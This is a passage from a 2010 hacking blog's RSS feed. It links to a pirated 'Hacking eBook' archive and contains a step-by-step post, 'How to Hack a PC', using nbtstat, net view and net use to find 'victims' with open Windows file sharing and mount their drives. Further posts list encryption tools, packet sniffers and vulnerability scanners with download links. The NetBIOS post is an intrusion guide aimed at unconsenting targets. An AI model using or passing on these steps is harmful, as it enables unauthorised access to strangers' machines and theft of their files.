href=&quot;http://hotfile.com/dl/37542960/ba62af1/Hacking_eBook_AIO.part2.rar.html&quot; style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Link 2(Part 2) &lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div align=&quot;center&quot;&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: lightyellow;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: #424242; font-family: tahoma; line-height: 18px;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/05/best-hacking-collection-34-in-1-aio.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6t_sfpA0q9BpK91_qFqxSqYMoXKH_VXxhirAWebLytK52Lqzj0YJZv5RXV9HXOvHYJs1_TXlBeaGD46Z2BEvQOhiPXo0xfhtwFSEuoGIYgX6_vPisJi7NA-0CIdrFjmqDeehD6KvuVYkv/s72-c/TheMostDangerousHackTool2009.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-2398049010920057825</guid><pubDate>Fri, 02 Apr 2010 15:32:00 +0000</pubDate><atom:updated>2010-04-02T21:02:24.616+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>How to Hack a PC Step by Step</title><description>NetBios hacking for windows 95/98/ME/NT/XP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Step 1&lt;br /&gt;
Get a IP (range) scanner. (superscanner is a fast one).&lt;br /&gt;
Scan the victim&#39;s ip on TCP/IP port 139&lt;br /&gt;
&lt;br /&gt;
Step 2&lt;br /&gt;
Open a dos prompt&lt;br /&gt;
Do this by going to start/run&lt;br /&gt;
enter command.com and press ok&lt;br /&gt;
&lt;br /&gt;
this is what you see:&lt;br /&gt;
c:windows&gt;&lt;br /&gt;
&lt;br /&gt;
This is what you need to type down:&lt;br /&gt;
[HIDE-REPLY]&lt;br /&gt;
Replace 255.255.255.255 with the victims IP address.&lt;br /&gt;
&lt;br /&gt;
c:windows&gt;nbtstat -a 255.255.255.255&lt;br /&gt;
&lt;br /&gt;
If you see this your in:&lt;br /&gt;
&lt;br /&gt;
NetBIOS Remote Machine Name Table&lt;br /&gt;
&lt;br /&gt;
Name Type Status&lt;br /&gt;
---------------------------------------------------------------&lt;br /&gt;
user&lt;00&gt; UNIQUE Registered&lt;br /&gt;
workgroup &lt;00&gt; GROUP Registered &lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
user &lt;03&gt; UNIQUE Registered&lt;br /&gt;
user &lt;20&gt; UNIQUE Registered&lt;br /&gt;
&lt;br /&gt;
MAC Address = xx-xx-xx-xx-xx-xx&lt;br /&gt;
---------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
If you don&#39;t get the number &lt;20&gt;.&lt;br /&gt;
The victim disabled the File And Printer Sharing, find a another victim.&lt;br /&gt;
&lt;br /&gt;
Step 3&lt;br /&gt;
&lt;br /&gt;
type down:&lt;br /&gt;
&lt;br /&gt;
c:windows&gt;net view 255.255.255.255&lt;br /&gt;
&lt;br /&gt;
if the output is like this:&lt;br /&gt;
&lt;br /&gt;
Shared resources at 255.255.255.255&lt;br /&gt;
ComputerNameGoesHere&lt;br /&gt;
&lt;br /&gt;
Sharename Type Used as Comment&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------&lt;br /&gt;
CDISK Disk xxxxx xxxxx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The command completed successfully.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&quot;DISK&quot; shows that the victim is sharing a Disk named as CDISK&lt;br /&gt;
&lt;br /&gt;
Step 4&lt;br /&gt;
&lt;br /&gt;
type down:&lt;br /&gt;
you can replace x: by anything letter yopu want but not your own drive letters.&lt;br /&gt;
CDISK is the name of the shared harddrive.&lt;br /&gt;
&lt;br /&gt;
c:windows&gt;net use x: 255.255.255.255CDISK&lt;br /&gt;
&lt;br /&gt;
If the command is successful we will get the confirmation.&lt;br /&gt;
The command was completed successfullly&lt;br /&gt;
&lt;br /&gt;
Now open windows explorer or just double click on the My Computer icon on your&lt;br /&gt;
desktop and you will see a new network drive X:&gt; . Now your are a small time hacker.&lt;br /&gt;
Good luck. &lt;br /&gt;
&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/04/how-to-hack-pc-step-by-step.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7617796762598218867</guid><pubDate>Tue, 30 Mar 2010 16:01:00 +0000</pubDate><atom:updated>2010-05-04T21:42:44.210+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><title>Encryption Tools</title><description>&lt;b&gt;GnuPG / PGP&lt;/b&gt; :- Secure your files and communication with the advanced encryption. PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;OpenSSL&lt;/b&gt; :- The premier SSL/TLS encryption library. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Tor&lt;/b&gt; :- An anonymous Internet communication system Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;b&gt;Stunnel&lt;/b&gt; :- A general-purpose SSL cryptographic wrapper. The stunnel program is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs&#39; code.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;OpenVPN&lt;/b&gt; :- A full-featured SSL VPN solution. OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; TrueCrypt&lt;/b&gt; :- Open-Source Disk Encryption Software for Windows and Linux. TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/03/encryption-tools_30.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-5571224406163899194</guid><pubDate>Sun, 28 Mar 2010 06:28:00 +0000</pubDate><atom:updated>2010-03-28T11:58:59.040+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><title>Packet Sniffers</title><description>&lt;b&gt;Ethereal&lt;/b&gt; :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.wireshark.org/download.html&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Kismet&lt;/b&gt; :- A powerful wireless sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.&lt;a href=&quot;http://www.kismetwireless.net/download.shtml&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;b&gt;Tcpdump&lt;/b&gt; :- The classic sniffer for network monitoring and data acquisition. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library.&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/goog_797370472&quot;&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://www.tcpdump.org/&quot;&gt;Download link&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;b&gt;&amp;nbsp;Ettercap&lt;/b&gt; :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/goog_797370475&quot;&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/ettercap/&quot;&gt;Download link&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;b&gt;DSniff &lt;/b&gt;:- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://www.monkey.org/%7Edugsong/dsniff/&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/03/packet-sniffers.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-1815385045849914954</guid><pubDate>Thu, 25 Mar 2010 06:47:00 +0000</pubDate><atom:updated>2010-03-25T12:18:41.270+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><title>Vulnerability Scanners</title><description>&lt;b&gt;Nessus&lt;/b&gt; :- Premier UNIX vulnerability assessment tool&lt;br /&gt;
Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.nessus.org/download/&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;GFI LANguard&lt;/b&gt; :- A commercial network security scanner for Windows&lt;br /&gt;
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine&#39;s service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.gfi.com/lannetscan/&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;b&gt;Retina&lt;/b&gt; :- Commercial vulnerability assessment scanner by eEye&lt;br /&gt;
Like Nessus, Retina&#39;s function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.eeye.com/html/Products/Retina/index.html&quot;&gt; Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Core Impact&lt;/b&gt; :- An automated, comprehensive penetration testing product. it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.coresecurity.com/&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ISS Internet Scanner :- Application-level vulnerability assessment&lt;br /&gt;
Internet Scanner started off in &#39;92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.iss.net/products_services/enterprise_protection%20/vulnerability_assessment/scanner_internet.php&quot;&gt;Download link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
SA&lt;span id=&quot;goog_1778013766&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_1778013767&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/&quot;&gt;&lt;/a&gt;RA :- Security Auditor’s Research Assistant&lt;br /&gt;
SARA is a third generation network security analysis tool that Operates under Unix, Linux, MAC OS/X or Windows. The first generation assistant, the Security Administrator&#39;s Tool for Analyzing Networks (SATAN) was developed in early 1995. It became the benchmark for network security analysis for several years. However, few updates were provided and the tool slowly became obsolete in the growing threat environment.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www-arc.com/sara&quot;&gt;Download link&lt;/a&gt;</description><link>http://hack-fun.blogspot.com/2010/03/vulnerability-scanners.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item></channel></rss>